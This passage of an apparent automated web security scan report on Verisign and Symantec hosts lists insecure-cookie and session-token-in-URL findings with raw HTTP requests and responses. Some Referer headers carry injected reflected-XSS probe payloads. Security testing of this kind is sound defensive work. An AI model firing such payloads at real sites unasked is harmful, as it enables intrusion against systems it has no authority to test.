Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line {    position
...[SNIP]...

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

6.67. https://www4.symantec.com/Vrt/wl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.symantec.com
Path:   /Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1
Host: www4.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:34:28 GMT
Content-type: text/html
X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]
Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/
Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


7. Session token in URL  previous  next
There are 15 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://idprotect.verisign.com/images/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache
Location: https://idprotect.verisign.com/images/favicon.ico
Content-Length: 330
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.2. https://idprotect.verisign.com/kaptcha.jpg  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /kaptcha.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive
Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:49:00 GMT
Server: Apache
Location: https://idprotect.verisign.com/kaptcha.jpg
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.3. https://idprotect.verisign.com/scripts/global.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /scripts/global.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:47:12 GMT
Server: Apache
Location: https://idprotect.verisign.com/scripts/global.js
Content-Length: 329
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.4. https://idprotect.verisign.com/toolbar/activate.v  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:48:59 GMT
Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Length: 7564
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<meta http-equiv="Expires" content="0" />

<link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/>

<title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print"
href="/common/styles/print.css" />

<script type="text/javascript"
src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc">
</script>
...[SNIP]...
<br/>

<img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" />&nbsp;&nbsp;
<img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

7.5. http://m.verisign.com/home.v  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://m.verisign.com
Path:   /home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:03:49 GMT
Server: Apache
Location: http://vipmobile.verisign.com/home.v
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/ubox/image

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif
Content-Length: 0
Date: Fri, 09 Sep 2011 21:24:33 GMT
Server: Test & Target


7.8. http://player.ooyala.com/sas/authorized  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://player.ooyala.com
Path:   /sas/authorized

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Status: 200 OK
Content-Type: text/xml
